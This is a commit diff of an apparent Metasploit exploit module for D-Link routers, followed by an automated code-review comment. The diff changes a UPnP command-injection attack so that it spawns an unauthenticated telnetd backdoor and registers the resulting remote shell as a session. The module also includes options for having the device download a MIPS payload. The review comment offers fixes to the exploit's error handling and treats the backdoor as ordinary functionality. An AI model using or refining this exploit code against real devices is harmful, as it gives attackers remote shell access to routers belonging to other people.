session now working
parent
9133dbac4a
commit
47ca4fd48f
|
@ -58,13 +58,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'unix'
|
||||
}
|
||||
],
|
||||
[ 'Telnet', #all devices
|
||||
[ 'Telnet', #all devices, use a netcat bind payload for getting a valid session
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'unix'
|
||||
}
|
||||
],
|
||||
[ 'Linux mipsel Payload', #DIR-865, DIR-645
|
||||
[ 'Linux mipsel Payload', #DIR-865, DIR-645, and some more
|
||||
{
|
||||
'Arch' => ARCH_MIPSLE,
|
||||
'Platform' => 'linux'
|
||||
|
@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
|
||||
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
|
||||
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
|
||||
OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
|
||||
OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
|
||||
#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
|
||||
#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -144,6 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
handler
|
||||
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
||||
|
||||
new_portmapping_description = rand_text_alpha(8)
|
||||
|
@ -170,15 +171,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if target.name =~ /Telnet/
|
||||
passw = datastore['TELNETPASS'] || rand_text_alpha(8)
|
||||
user = datastore['TELNETUSER'] || rand_text_alpha(4)
|
||||
#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
|
||||
#user = datastore['TELNETUSER'] || rand_text_alpha(4)
|
||||
telnetport = rand(65535)
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - User: #{user}")
|
||||
vprint_status("#{rhost}:#{rport} - Password: #{passw}")
|
||||
#vprint_status("#{rhost}:#{rport} - User: #{user}")
|
||||
#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
|
||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||
|
||||
cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
cmd = "telnetd -p #{telnetport}" # -l \"/usr/sbin/login\" -u #{user}:#{passw}"
|
||||
type = "add"
|
||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
||||
if (!res or res.code != 200)
|
||||
|
@ -199,13 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
end
|
||||
|
||||
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
|
||||
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
|
||||
auth_info = {
|
||||
:host => rhost,
|
||||
:port => telnetport,
|
||||
:sname => 'telnet',
|
||||
:user => user,
|
||||
:pass => passw,
|
||||
#:user => user,
|
||||
#:pass => passw,
|
||||
:source_type => "exploit",
|
||||
:active => true
|
||||
}
|
||||
|
@ -214,13 +216,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'USERPASS_FILE' => nil,
|
||||
'USER_FILE' => nil,
|
||||
'PASS_FILE' => nil,
|
||||
'USERNAME' => user,
|
||||
'PASSWORD' => passw
|
||||
#'USERNAME' => user,
|
||||
#'PASSWORD' => passw
|
||||
}
|
||||
# NOT WORKING
|
||||
conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
|
||||
#puts conn.methods.to_s
|
||||
start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
|
||||
#taken from ./lib/msf/core/auxiliary/commandshell.rb
|
||||
info = "TELNET (#{rhost}:#{telnetport})"
|
||||
sess = Msf::Sessions::CommandShell.new(sock)
|
||||
sess.set_from_exploit(self)
|
||||
sess.info = info
|
||||
|
||||
# Clean up the stored data
|
||||
sess.exploit_datastore.merge!(merge_me)
|
||||
|
||||
# Prevent the socket from being closed
|
||||
self.sockets.delete(sock)
|
||||
self.sock = nil if self.respond_to? :sock
|
||||
|
||||
framework.sessions.register(sess)
|
||||
sess.process_autoruns(datastore)
|
||||
|
||||
sess
|
||||
rescue
|
||||
print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
|
||||
end
|
||||
|
|
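Review bot: The existing `rescue` at the end of the last hunk now also wraps the new session-setup code (`Msf::Sessions::CommandShell.new(sock)` through `sess.process_autoruns(datastore)`), so any exception raised there is swallowed and reported as "Backdoor service has not been spawned!!!", which misattributes a session-registration failure to the telnetd step; the backdoor may in fact be running. It should capture the error and say what failed, e.g. `rescue => e` / `print_error("#{rhost}:#{rport} - Failed to set up the Telnet session: #{e.class}: #{e.message}")`. Note also that `self.sockets.delete(sock)` runs before `framework.sessions.register(sess)`; if registration raises, the socket appears to be untracked by the module and is presumably never closed, so the delete should move after a successful register. The commented-out `#'USERNAME' => user` / `#'PASSWORD' => passw` lines in `merge_me` (and the matching commented-out TELNETUSER/TELNETPASS options and `vprint_status` calls in the earlier hunks) should be removed rather than left as dead code, since the daemon in this change is started without `-l`/`-u`; the enclosing `exploit` method begins outside this hunk.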